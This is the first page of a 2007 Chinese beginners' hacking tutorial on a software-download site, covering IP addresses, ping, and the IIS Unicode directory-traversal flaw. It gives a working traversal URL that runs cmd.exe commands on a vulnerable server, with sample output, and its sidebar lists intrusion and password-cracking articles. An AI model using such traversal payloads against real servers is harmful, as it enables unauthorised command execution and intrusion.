文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | firefox | WPS | 杀毒软件 | Picasa
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术从零开始学黑客:网络黑客新手入门指南
精品推荐
特别推荐
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
·黑客攻击的几种常用手法及防御技巧
·经典常见计算机密码破解实用手册
·经典总结:各个网络端口的入侵
·最详细的黑客入门法则
·Telnet高级入侵攻略及原理
·攻防技巧PHP数据库安全之SQL注入
热点TOP10
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·经典常见计算机密码破解实用手册
·Windows黑客编程基础
·不用任何软件(木马程序)盗取账号密码
·流光教程一
·流光5.0使用小窍门
·菜鸟变黑客高手
·从零开始学黑客:网络黑客新手入门指南
·Telnet高级入侵攻略及原理
·IIS攻击与日志
·公钥密码系统及RSA公钥算法
·谁能知道微软在你的计算机里隐藏的秘密
·黑客入侵前的信息收集
·黑客破解电脑密码实用技巧大全!
·黑客技术之知道对方IP入侵别人的电脑
·SQL 入侵教程
·经典:各个网络端口的入侵方法
·收费网站破解攻略

从零开始学黑客:网络黑客新手入门指南

日期:2007年10月23日 作者: 查看:[大字体 中字体 小字体]



  (一)系统基本知识
  1.a.什么是IP:要是真的想说清楚什么是IP,那是一项很繁重的工作。简单的来说,IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后,每台机器都会有一个唯一的合法的IP地址,一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成,第一段数字可为1-255,后三段数字可为0-255,且所有的IP地址分为A、B、C、D、E五类,主要是A、B、C三类。其有效范围如下表所示:
  类别 网络号 主机号
  
  A 1~126 0~255 0~255 1~254
  B 128~191 0~255 0~255 1~254
  C 192~223 0~255 0~255 1~254
  有关IP地址的问题可以查阅相关的资料,笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~: p
  
  1.b.怎样得到自己和别人的IP呢?以Windows 98为例:在“开始”—“运行”里输入:winipcfg。接着,Windows就会打开“IP 配置”。其中,在“Ethernet 适配器信息”—“IP 地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP,可以使用一些工具软件,不过最简单的使用Windows自带的一个小程序ping.exe。在MS-DOS命令行下输入ping www.xxx.com。会出现:
  C:\>ping www.xxx.com
  
  Pinging www.xxx.com [xxx.xxx.xxx.xxx] with 32 bytes of data:
  
  Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
  Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
  Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116
  
  Ping statistics for xxx.xxx.xxx.xxx:
  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
  Minimum = 120ms, Maximum = 630ms, Average = 187ms
  
  其中:xxx.xxx.xxx.xxx 就是 http://www.xxx.com的网络服务器的IP地址。
  
  2.a.Unicode漏洞:“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。
  IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含Unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。(Win NT4 编码为:%c1%9c ,Win2000 英文版 编码为:%c0%af)
  
  假设目标主机为英文版Winodows 2k,IP为xxx.xxx.xxx.xxx,且存在Unicode漏洞,那么我们在浏览器里输入:
  http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir ,之后浏览器就会显示如下内容:
  Directory of C:\inetpub\scripts
  2002-02-08 15:49 〈DIR〉 .
  2002-02-08 15:49 〈DIR〉 ..
  2002-02-08 10:20 Index.Html
  2002-02-08 10:20 background.jpg
  ........................................
  从上面的测试可以看出:"http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"后就是DOS命令了:"dir"

[1] [2] [3] 下一页 




上一篇:入侵检测系统的优点和缺点深入分析

下一篇:SAN是怎么利用phpnuke的漏洞做坏事的

从零开始学黑客:网络黑客新手入门指南 相关文章:
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·初级网管或黑客必需撑握的8个DOS命令
·网络玄幻小说十大网站
·WinXP中常见网络与安全服务详解
·高手进阶,终极内存技术指南——完整/进阶版
·MPEG、RM、WMV电影文件格式转换指南
·常用破解网络密码的方法多个
·暗黑破坏神2:毁灭之王 装备修改指南 - 游戏攻略
·屏蔽五项网络功能 让XP系统极速狂飙
从零开始学黑客:网络黑客新手入门指南 相关软件:
·孙鑫VC++从入门到精通开发详解视频教程FLASH版
·极速通网络加速器v2.04
·黑客视频教程 VMware虚拟机的安装和使用
·Vgo网络电视V3.0
·盈速通网络加速器V1.2
·网络常见问题与故障1000例
·黑客必备黑客技术宝库电子书籍
·黑客视频教程-灰鸽子远控使用教程
·八匹马网络加速器V1.1.2.6952
·CorelDraw12 入门与实例(图文教程 菜鸟先飞系列教材)

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot